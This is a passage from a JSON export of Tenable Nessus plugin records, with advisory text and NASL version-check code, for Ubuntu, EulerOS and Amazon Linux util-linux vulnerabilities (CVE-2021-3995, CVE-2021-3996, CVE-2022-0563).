"p-cpe:/a:canonical:ubuntu_linux:libblkid-dev", "p-cpe:/a:canonical:ubuntu_linux:libblkid1", "p-cpe:/a:canonical:ubuntu_linux:libfdisk-dev", "p-cpe:/a:canonical:ubuntu_linux:libfdisk1", "p-cpe:/a:canonical:ubuntu_linux:libmount-dev", "p-cpe:/a:canonical:ubuntu_linux:libmount1", "p-cpe:/a:canonical:ubuntu_linux:libsmartcols-dev", "p-cpe:/a:canonical:ubuntu_linux:libsmartcols1", "p-cpe:/a:canonical:ubuntu_linux:libuuid1", "p-cpe:/a:canonical:ubuntu_linux:mount", "p-cpe:/a:canonical:ubuntu_linux:rfkill", "p-cpe:/a:canonical:ubuntu_linux:util-linux", "p-cpe:/a:canonical:ubuntu_linux:util-linux-locales", "p-cpe:/a:canonical:ubuntu_linux:uuid-dev", "p-cpe:/a:canonical:ubuntu_linux:uuid-runtime"], "id": "UBUNTU_USN-5279-1.NASL", "href": "https://www.tenable.com/plugins/nessus/157843", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5279-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157843);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n script_xref(name:\"USN\", value:\"5279-1\");\n\n script_name(english:\"Ubuntu 20.04 LTS : util-linux vulnerabilities (USN-5279-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 20.04 LTS host has packages installed that are affected by multiple vulnerabilities as referenced in\nthe USN-5279-1 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5279-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bsdutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:fdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libblkid-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libblkid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libfdisk-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libfdisk1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmount-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmount1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsmartcols-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libsmartcols1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libuuid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:rfkill\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:util-linux-locales\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:uuid-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:uuid-runtime\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2022-2023 Canonical, Inc. / NASL script (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('20.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 20.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '20.04', 'pkgname': 'bsdutils', 'pkgver': '1:2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'fdisk', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libblkid-dev', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libblkid1', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libfdisk-dev', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libfdisk1', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libmount-dev', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libmount1', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libsmartcols-dev', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libsmartcols1', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'libuuid1', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'mount', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'rfkill', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'util-linux', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'util-linux-locales', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'uuid-dev', 'pkgver': '2.34-0.1ubuntu9.3'},\n {'osver': '20.04', 'pkgname': 'uuid-runtime', 'pkgver': '2.34-0.1ubuntu9.3'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'bsdutils / fdisk / libblkid-dev / libblkid1 / libfdisk-dev / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-02T15:03:48", "description": "According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-04-18T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : util-linux (EulerOS-SA-2022-1440)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-11-01T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libblkid", "p-cpe:/a:huawei:euleros:libfdisk", "p-cpe:/a:huawei:euleros:libmount", "p-cpe:/a:huawei:euleros:libsmartcols", "p-cpe:/a:huawei:euleros:libuuid", "p-cpe:/a:huawei:euleros:util-linux", "p-cpe:/a:huawei:euleros:util-linux-user", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1440.NASL", "href": "https://www.tenable.com/plugins/nessus/159780", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159780);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/01\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"EulerOS 2.0 SP9 : util-linux (EulerOS-SA-2022-1440)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected\nby the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1440\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5c64f2b0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"libblkid-2.35.1-1.h24.eulerosv2r9\",\n \"libfdisk-2.35.1-1.h24.eulerosv2r9\",\n \"libmount-2.35.1-1.h24.eulerosv2r9\",\n \"libsmartcols-2.35.1-1.h24.eulerosv2r9\",\n \"libuuid-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-2.35.1-1.h24.eulerosv2r9\",\n \"util-linux-user-2.35.1-1.h24.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-15T17:37:15", "description": "The version of util-linux installed on the remote host is prior to 2.37.4-1. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2022-2022-218 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an INPUTRC environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-12-10T00:00:00", "type": "nessus", "title": "Amazon Linux 2022 : util-linux (ALAS2022-2022-218)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2022-0563"], "modified": "2023-09-15T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:libblkid", "p-cpe:/a:amazon:linux:libblkid-debuginfo", "p-cpe:/a:amazon:linux:libblkid-devel", "p-cpe:/a:amazon:linux:libfdisk", "p-cpe:/a:amazon:linux:libfdisk-debuginfo", "p-cpe:/a:amazon:linux:libfdisk-devel", "p-cpe:/a:amazon:linux:libmount", "p-cpe:/a:amazon:linux:libmount-debuginfo", "p-cpe:/a:amazon:linux:libmount-devel", "p-cpe:/a:amazon:linux:libsmartcols", "p-cpe:/a:amazon:linux:libsmartcols-debuginfo", "p-cpe:/a:amazon:linux:libsmartcols-devel", "p-cpe:/a:amazon:linux:libuuid", "p-cpe:/a:amazon:linux:libuuid-debuginfo", "p-cpe:/a:amazon:linux:libuuid-devel", "p-cpe:/a:amazon:linux:python3-libmount", "p-cpe:/a:amazon:linux:python3-libmount-debuginfo", "p-cpe:/a:amazon:linux:util-linux", "p-cpe:/a:amazon:linux:util-linux-core", "p-cpe:/a:amazon:linux:util-linux-core-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debugsource", "p-cpe:/a:amazon:linux:util-linux-user", "p-cpe:/a:amazon:linux:util-linux-user-debuginfo", "p-cpe:/a:amazon:linux:uuidd", "p-cpe:/a:amazon:linux:uuidd-debuginfo", "cpe:/o:amazon:linux:2022"], "id": "AL2022_ALAS2022-2022-218.NASL", "href": "https://www.tenable.com/plugins/nessus/168590", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2022 Security Advisory ALAS2022-2022-218.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168590);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/15\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\", \"CVE-2022-0563\");\n\n script_name(english:\"Amazon Linux 2022 : util-linux (ALAS2022-2022-218)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2022 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of util-linux installed on the remote host is prior to 2.37.4-1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS2022-2022-218 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The\n Readline library uses an INPUTRC environment variable to get a path to the library config file. When the\n library cannot parse the specified file, it prints an error message containing data from the file. This\n flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2022/ALAS-2022-218.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3995.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3996.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-0563.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update util-linux' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0563\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:uuidd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:uuidd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2022\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar alas_release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(alas_release) || !strlen(alas_release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:alas_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"-2022\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2022\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'libblkid-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022.0.2', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2022.0.2', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2022.0.2', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n 